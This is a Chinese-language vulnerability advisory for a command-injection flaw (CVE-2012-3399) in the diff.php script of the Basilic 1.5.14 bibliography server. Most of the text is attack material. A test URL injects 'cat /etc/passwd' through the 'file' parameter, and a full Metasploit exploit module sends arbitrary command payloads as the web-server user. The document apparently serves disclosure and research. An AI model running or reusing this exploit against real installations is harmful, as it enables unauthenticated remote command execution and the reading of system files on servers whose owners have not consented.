发布日期：2012-06-28
更新日期：2012-06-28

受影响系统：

Basilic Basilic 1.5.14

描述：

---

BUGTRAQ  ID: 54234
CVE(CAN) ID: CVE-2012-3399

Basilic是适用于研究机构的文献目录服务器。

Basilic 1.5.14 及其他版本没有正确验证diff.php脚本传递的输入即用在 'file' 参数内，可被远程攻击者利用执行任意命令。

<*来源：Mahdi Razavi
  
  链接：http://osvdb.org/show/osvdb/83719
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1）
http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&amp;amp;new=1&amp;amp;old=2

2）
The following exploit is available:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
            'Description'    => %q{
                    This module abuses a metacharacter injection vulnerability in the
                diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
                commands as the www-data user account.
            },
            'Author'         =>
                [
                    'lcashdollar',
                    'sinn3r',
                    'juan'
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'BID', '54234' ]
                ],
            'Platform'       => ['linux', 'unix'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => true,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic perl ruby bash telnet'
                        }
                },
            'Targets'        =>
                [
                    [ 'Automatic Target', { }]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Jun 28 2012'
        ))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
            ], self.class)
    end


    def check
        base = target_uri.path
        base << '/' if base[-1, 1] != '/'

        sig = rand_text_alpha(10)

        res = send_request_cgi({
            'uri'  => "/#{base}/Config/diff.php",
            'vars_get' => {
                'file' => sig,
                'new'  => '1',
                'old'  => '2'
            }
        })

        if res and res.body =~ /#{sig}/
            return Exploit::CheckCode::Vulnerable
        else
            return Exploit::CheckCode::Safe
        end
    end


    def exploit
        print_status("Sending GET request...")

        base = target_uri.path
        base << '/' if base[-1, 1] != '/'

        res = send_request_cgi({
                'uri' => "/#{base}/Config/diff.php",
                'vars_get' => {
                    'file' => "&#{payload.encoded} #",
                    'new'  => '1',
                    'old'  => '2'
                }
            })

        if res and res.code == 404 then
            print_error("404 Basilic not installed or possibly check URI Path.")
        else
            vprint_line(res.body) if res
        end

        handler
    end
end

建议：

---

厂商补丁：

Basilic
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://artis.imag.fr/Software/Basilic/

浏览次数：2519
严重程度：0（网友投票）